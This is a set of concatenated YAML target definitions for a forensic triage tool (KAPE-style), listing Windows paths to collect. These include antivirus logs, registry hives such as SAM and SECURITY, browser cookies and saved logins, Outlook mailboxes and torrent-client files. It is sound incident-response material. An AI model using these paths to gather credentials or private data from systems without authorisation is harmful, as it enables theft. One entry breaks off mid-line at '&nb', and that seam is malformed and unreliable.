Id: 14ac7bff-2d77-4582-8558-73cf75805aaa
RecreateDirectories: true
Targets:
-
Name: ESET NOD32 AV Logs (XP)
Category: Antivirus
Path: C:\Documents and Settings\All Users\Application Data\ESET\ESET NOD32 Antivirus\Logs\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: ESET NOD32 AV Logs
Category: Antivirus
Path: C:\ProgramData\ESET\ESET NOD32 Antivirus\Logs\
IsDirectory: true
Recursive: true
Comment: "Parser available at https://github.com/laciKE/EsetLogParser"
Description: ComboFix Antivirus Data
Author: Drew Ervin
Version: 1.0
Id: 8fb8608e-65ab-4fd1-b7a4-13618caf5ad7
RecreateDirectories: true
Targets:
-
Name: ComboFix
Category: Antivirus
Path: C:\ComboFix.txt
IsDirectory: false
Recursive: false
Comment: ""
Description: Bitdefender Antivirus Data
Author: Drew Ervin
Version: 1.0
Id: e48c32bf-4069-4f79-acac-4ed181fa84c9
RecreateDirectories: true
Targets:
-
Name: Bitdefender Endpoint Security Logs
Category: Antivirus
Path: C:\ProgramData\Bitdefender\Endpoint Security\Logs\
IsDirectory: true
Recursive: true
Comment: ""
Description: Avira Logs
Author: Fabian Murer
Version: 1.0
Id: f977c6c9-378b-4812-a5ca-1f6c5fe57b18
RecreateDirectories: true
Targets:
-
Name: Avira Activity Logs
Category: AntiVirus
Path: C:\ProgramData\Avira\Antivirus\LOGFILES
IsDirectory: true
Recursive: true
Comment: "Collects the scan logs of Avira AntiVirus"
Description: Avast Antivirus Data
Author: Drew Ervin
Version: 1.0
Id: 8b625ea2-fafa-46be-8ba1-15efd1de2a53
RecreateDirectories: true
Targets:
-
Name: Avast AV Logs (XP)
Category: Antivirus
Path: C:\Documents And Settings\All Users\Application Data\Avast Software\Avast\Log
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Avast AV Logs
Category: Antivirus
Path: C:\ProgramData\Avast Software\Avast\Log\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Avast AV User Logs
Category: Antivirus
Path: C:\Users\*\Avast Software\Avast\Log
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Avast AV Index
Category: Antivirus
Path: C:\ProgramData\Avast Software\Avast\Chest\index.xml
IsDirectory: false
Recursive: false
Comment: ""
Description: PowerShell Console Log File
Author: Mike Cary
Version: 1
Id: efa4332a-89eb-430c-ab61-006a9e6620d7
RecreateDirectories: true
Targets:
-
Name: PowerShell Console Log
Category: PowerShellConsleLog
Path: C:\users\*\Appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
IsDirectory: false
Recursive: false
Comment: ""
Description: NGINX Log Files
Author: Eric Capuano
Version: 1
Id: d5c2cfd9-a8a5-400e-8be5-a8e9b5653a51
RecreateDirectories: true
Targets:
-
Name: NGINX Log Files
Category: Logs
Path: C:\nginx\logs\*.log
IsDirectory: false
Recursive: false
Comment: ""
Description: MS SQL ErrorLogs
Author: Troy Larson
Version: 1
Id: cb789cbf-bf4a-4491-b6d9-9e2d002bd85e
RecreateDirectories: true
Targets:
-
Name: MS SQL Errorlog
Category: SQL Exploitation
Path: C:\Program Files\Microsoft SQL Server\*\MSSQL\LOG\ERRORLOG
IsDirectory: false
Recursive: false
Comment: ""
-
Name: MS SQL Errorlogs
Category: SQL Exploitation
Path: C:\Program Files\Microsoft SQL Server\*\MSSQL\LOG\ERRORLOG.*
IsDirectory: false
Recursive: false
Comment: ""
Description: IIS Log Files
Author: Troy Larson
Version: 2
Id: 701573f6-0ce1-454d-af41-612713e22af5
RecreateDirectories: true
Targets:
-
Name: IIS log files
Category: Logs
Path: C:\Windows*\system32\LogFiles\W3SVC*\*.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: IIS log files
Category: Logs
Path: C:\inetpub\logs\LogFiles\*.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: IIS log files
Category: Logs
Path: C:\inetpub\logs\LogFiles\W3SVC*\*.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: IIS log files
Category: Logs
Path: C:\Resources\directory\* \LogFiles\Web\W3SVC*\*.log
IsDirectory: false
Recursive: false
Comment: ""
Description: Apache Access Log
Author: Hadar Yudovich
Version: 1
Id: 6ad85ab3-701a-409c-98b8-ea4ef806cdf0
RecreateDirectories: true
Targets:
-
Name: Apache Access Log
Category: Webservers
Path: C:\
FileMask: 'access.log'
IsDirectory: true
Recursive: true
Comment: "Locates Apache access.log file"
Description: SANS Triage Collection.
# No Compound Targets used in this target. That is intended to make this target
# "self documenting" for the SANS 500 Students.
Author: Mark Hallman
Version: 1
Id: 5dbe9218-fd3d-4d86-88aa-56001d38e7f5
RecreateDirectories: true
Targets:
# Event Logs
-
Name: Event logs XP
Category: EventLogs
Path: C:\Windows\system32\config\*.evt
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Event logs Win7+
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\*.evtx
IsDirectory: false
Recursive: false
Comment: ""
# Evidence of Execution
-
Name: Prefetch
Category: Prefetch
Path: C:\Windows*\prefetch\*.pf
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RecentFileCache
Category: ApplicationCompatability
Path: C:\Windows*\AppCompat\Programs\RecentFileCache.bcf
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Amcache
Category: ApplicationCompatibility
Path: C:\Windows*\AppCompat\Programs\Amcache.hve
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Amcache transaction files
Category: ApplicationCompatibility
Path: C:\Windows*\AppCompat\Programs\Amcache.hve.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Syscache
Category: Program Execution
Path: C:\System Volume Information\Syscache.hve
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Syscache transaction files
Category: Program Execution
Path: C:\System Volume Information\Syscache.hve.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: PowerShell Console Log
Category: PowerShellConsleLog
Path: C:\users\*\Appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
IsDirectory: false
Recursive: false
Comment: ""
# File System
-
Name: $MFT
Category: FileSystem
Path: C:\$MFT
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
-
Name: $LogFile
Category: FileSystem
Path: C:\$LogFile
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
-
Name: $J
Category: FileSystem
Path: c:\$Extend\$UsnJrnl:$J
IsDirectory: false
Recursive: false
SaveAsFileName: $J
Comment: ""
-
Name: $Max
Category: FileSystem
Path: c:\$Extend\$UsnJrnl:$Max
IsDirectory: false
Recursive: false
SaveAsFileName: $Max
Comment: ""
-
Name: $SDS
Category: FileSystem
Path: c:\$Secure:$SDS
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
SaveAsFileName: $Secure_$SDS
Comment: ""
-
Name: $Boot
Category: FileSystem
Path: c:\$Boot
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
-
Name: $T
Category: FileSystem
Path: c:\$Extend\$RmMetadata\$TxfLog\$Tops:$T
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
SaveAsFileName: $T
Comment: ""
# Link Files and JumpLists
-
Name: Lnk files from Recent
Category: LnkFiles
Path: C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent
IsDirectory: true
Recursive: true
Comment: Also includes automatic and custom jumplist directories
-
Name: Lnk files from Microsoft Office Recent
Category: LnkFiles
Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Lnk files from Recent (XP)
Category: LnkFiles
Path: C:\Documents and Settings\*\Recent
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Desktop lnk files XP
Category: LnkFiles
Path: C:\Documents and Settings\*\Desktop\*.lnk
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Desktop lnk files
Category: LnkFiles
Path: C:\Users\*\Desktop\*.lnk
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Restore point lnk files XP
Category: LnkFiles
Path: C:\System Volume Information\_restore*\RP*\*.lnk
IsDirectory: false
Recursive: false
Comment: ""
# Recycle Bin and Recycler
-
Name: $Recycle.Bin
Category: Deleted Files
Path: C:\$Recycle.Bin\*
IsDirectory: false
Recursive: true
Comment: ""
-
Name: RECYCLER WinXP
Category: Deleted Files
Path: C:\RECYCLER\*
IsDirectory: true
Recursive: true
Comment: ""
# System Registry Files
-
Name: SAM registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SAM.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SECURITY registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SECURITY.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SOFTWARE registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SOFTWARE.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SYSTEM.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SAM registry hive
Category: Registry
Path: C:\Windows*\System32\config\SAM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SECURITY registry hive
Category: Registry
Path: C:\Windows*\System32\config\SECURITY
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SOFTWARE registry hive
Category: Registry
Path: C:\Windows*\System32\config\SOFTWARE
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry hive
Category: Registry
Path: C:\Windows*\System32\config\SYSTEM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RegBack registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\RegBack\*.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SAM registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SAM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SECURITY registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SECURITY
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SOFTWARE registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SOFTWARE
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SYSTEM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SYSTEM1
IsDirectory: false
Recursive: false
Comment: ""
-
Name: System Profile registry hive
Category: Registry
Path: C:\Windows*\System32\config\systemprofile\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: System Profile registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\systemprofile\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Local Service registry hive
Category: Registry
Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Local Service registry transaction files
Category: Registry
Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Network Service registry hive
Category: Registry
Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Network Service registry transaction files
Category: Registry
Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: System Restore Points Registry Hives (XP)
Category: Registry
Path: C:\System Volume Information\_restore*\RP*\snapshot\_REGISTRY_*
IsDirectory: false
Recursive: false
Comment: ""
# User Registry Files
-
Name: ntuser.dat registry hive XP
Category: Registry
Path: C:\Documents and Settings\*\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat registry hive
Category: Registry
Path: C:\Users\*\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat registry transaction files
Category: Registry
Path: C:\Users\*\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat DEFAULT registry hive
Category: Registry
Path: C:\Windows*\System32\config\DEFAULT
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat DEFAULT transaction files
Category: Registry
Path: C:\Windows*\System32\config\DEFAULT.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: UsrClass.dat registry hive
Category: Registry
Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: UsrClass.dat registry transaction files
Category: Registry
Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
# System Level Artifacts
# Schedules Tasks
-
Name: at .job
Category: Persistence
Path: C:\Windows*\Tasks\*.job
IsDirectory: false
Recursive: false
Comment: ""
-
Name: at SchedLgU.txt
Category: Persistence
Path: C:\Windows*\Tasks\SchedLgU.txt
IsDirectory: false
Recursive: false
Comment: ""
-
Name: XML
Category: Persistence
Path: C:\Windows*\system32\Tasks
IsDirectory: true
Recursive: true
Comment: ""
-
Name: SRUM
Category: Execution
Path: C:\Windows*\System32\SRU
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Thumbcache DB
Category: FileKnowledge
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Explorer\thumbcache_*.db
IsDirectory: false
Recursive: false
Comment: ""
# USB Devices Logs
-
Name: Setupapi.log XP
Category: USBDevices
Path: C:\Windows\setupapi.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Setupapi.log Win7+
Category: USBDevices
Path: C:\Windows*\inf\setupapi.dev.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: WindowsIndexSearch
Category: FileKnowledge
Path: C:\programdata\microsoft\search\data\applications\windows\Windows.edb
IsDirectory: false
Recursive: false
Comment: ""
-
Name: WBEM
Category: WBEM
Path: C:\Windows*\System32\wbem\Repository
IsDirectory: true
Recursive: true
Comment: ""
# User Communication
# Outlook PST and OST files
-
Name: PST XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.pst
IsDirectory: false
Recursive: false
Comment: ""
-
Name: OST XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.ost
IsDirectory: false
Recursive: false
Comment: ""
-
Name: PST
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.pst
IsDirectory: false
Recursive: false
Comment: ""
-
Name: OST
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.ost
IsDirectory: false
Recursive: false
Comment: ""
# Skype
-
Name: main.db (App <v12)
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\main.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: skype.db (App +v12)
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\skype.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: main.db XP
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Skype\*\main.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: main.db Win7+
Category: Communications
Path: C:\Users\*\AppData\Roaming\Skype\*\main.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: s4l-[username].db (App +v8)
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\s4l-*.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: leveldb (Skype for Desktop +v8)
Category: Communications
Path: C:\Users\*\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\*.leveldb\*.log
IsDirectory: false
Recursive: false
Comment: ""
# Web Browser Artificats
-
Name: Chrome bookmarks XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Bookmarks*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Cookies XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Cookies*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Session XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Tabs XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Current Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Favicons XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Favicons*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome History XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\History*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Session XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Tabs XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Last Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Preferences XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Preferences
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Shortcuts XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Shortcuts*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Top Sites XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Top Sites*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Visited Links XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Visited Links
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Web Data XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Web Data*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome bookmarks
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Bookmarks*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Cookies
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Cookies*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Session
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Current Tabs
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Current Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Favicons
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Favicons*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome History
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\History*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Session
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Session
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Last Tabs
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Last Tabs
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Preferences
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Preferences
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Shortcuts
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Shortcuts*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Top Sites
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Top Sites*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Visited Links
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Visited Links
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Web Data
Category: Communications
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Web Data*
IsDirectory: false
Recursive: false
Comment:
-
Name: Chrome Extension Files
Category: Communication
Path: C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Extensions
IsDirectory: true
Recursive: true
-
Name: Chrome Extension Files XP
Category: Communications
Path: c:\Documents and Settings\*\Local Settings\Application Data\Google\Chrome\User Data\*\Extensions
IsDirectory: true
Recursive: true
-
Name: Edge folder
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
IsDirectory: True
Recursive: True
Comment: ""
-
Name: WebcacheV01.dat
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache
IsDirectory: Yes
Recursive: false
Comment: ""
-
Name: Firefox Places
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Downloads
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\downloads.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Form history
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Cookies
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Signons
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\signons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Webappstore
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\webappstore.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Favicons
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\favicons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Addons
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\addons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Search
Category: Communications
Path: C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\search.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Places (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\places.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Downloads (XP)
Category: Communications (XP)
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\downloads.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Form history (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\formhistory.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Cookies (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\cookies.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Forefox Signons (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\signons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Webappstore (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\webappstore.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Favicons (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\favicons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Addons (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\addons.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Firefox Search (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\search.sqlite*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat History
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat History subdirectory
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\History\History.IE5\*\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat temp internet files
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Temporary Internet Files\Content.IE5\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat cookies (XP)
Category: Communications
Path: C:\Documents and Settings\*\Cookies\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat UserData (XP)
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Microsoft\Internet Explorer\UserData\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat Office XP
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Microsoft\Office\Recent\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Index.dat Office
Category: Communications
Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent\index.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Local Internet Explorer folder
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Internet Explorer\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Roaming Internet Explorer folder
Category: Communications
Path: C:\Users\*\AppData\Roaming\Microsoft\Internet Explorer\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 History
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\History\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 Cache
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Temporary Internet Files\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 Cookies
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Cookies\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 9/10 Download History
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\IEDownloadHistory\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 11 Metadata
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache
IsDirectory: true
Recursive: false
Comment: ""
-
Name: IE 11 Cache
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\INetCache\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: IE 11 Cookies
&nb
Description: Basic Collection
Author: Phill Moore
Version: 1
Id: 83b99299-2d84-4844-af25-c727d3440b19
RecreateDirectories: true
Targets:
-
Name: Event Logs
Category: Event Logs
Path: EventLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Evidence of Execution
Category: Evidence Of Execution
Path: EvidenceOfExecution.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: File System
Category: File System
Path: FileSystem.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: LnkFilesAndJumpLists
Category: File Access
Path: LnkFilesAndJumpLists.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: PowerShellConsole
Category: Evidence Of Execution
Path: PowerShellConsole.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RecycleBinMetadata
Category: File Deletion
Path: RecycleBinMetadata.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RegistryHives
Category: Registry Hives
Path: RegistryHives.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ScheduledTasks
Category: ScheduledTasks
Path: ScheduledTasks.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SRUM
Category: SRUM
Path: SRUM.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ThumbCache
Category: Thumbcache
Path: Thumbcache.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: USBDevicesLogs
Category: USB
Path: USBDevicesLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: WindowsIndexSearch
Category: Search
Path: WindowsIndexSearch.tkape
IsDirectory: false
Recursive: false
Comment: ""
Description: Torrent Files
Author: Tony Knutson
Version: 2.0
Id: 082de7fa-17b4-4e10-a4e8-94ef2fb27ec2
RecreateDirectories: true
Targets:
-
Name: Torrents
Category: FileDownload
Path: C:\
FileMask: '*.torrent'
IsDirectory: true
Recursive: true
Comment: "Locates .torrent files and copies them"
Description: Torrent Clients
Author: Banaanhangwagen
Version: 1
Id: c43f37fb-1b2f-437c-8595-b5b095a0ca7b
RecreateDirectories: true
Targets:
-
Name: TorrentClients - qBittorrent
Category: FileDownload
Path: C:\Users\*\AppData\Roaming\qBittorrent\*.ini
IsDirectory: false
Recursive: false
Comment: "Locates settings files and copies them"
-
Name: TorrentClients - qBittorrent
Category: FileDownload
Path: C:\Users\*\AppData\Local\qBittorrent\logs
IsDirectory: false
Recursive: false
Comment: "Locates log files and copies them"
-
Name: TorrentClients - uTorrent
Category: FileDownload
Path: C:\Users\*\AppData\Roaming\uTorrent\*.dat
IsDirectory: false
Recursive: false
Comment: "Locates settings files and copies them"
-
Name: TorrentClients - BitTorrent
Category: FileDownload
Path: C:\Users\*\AppData\Roaming\BitTorrent\*.dat
IsDirectory: false
Recursive: false
Comment: "Locates settings files and copies them"
Description: Gigatribe Files
Author: Linus Nissi
Version: 2
Id: 64726d74-1a68-463a-bb26-929054a20b71
RecreateDirectories: true
Targets:
-
Name: Gigatribe Files Windows Vista/7/8/10
Category: FileDownload
Path: C:\Users\*\AppData\Local\Shalsoft\*
IsDirectory: true
Recursive: true
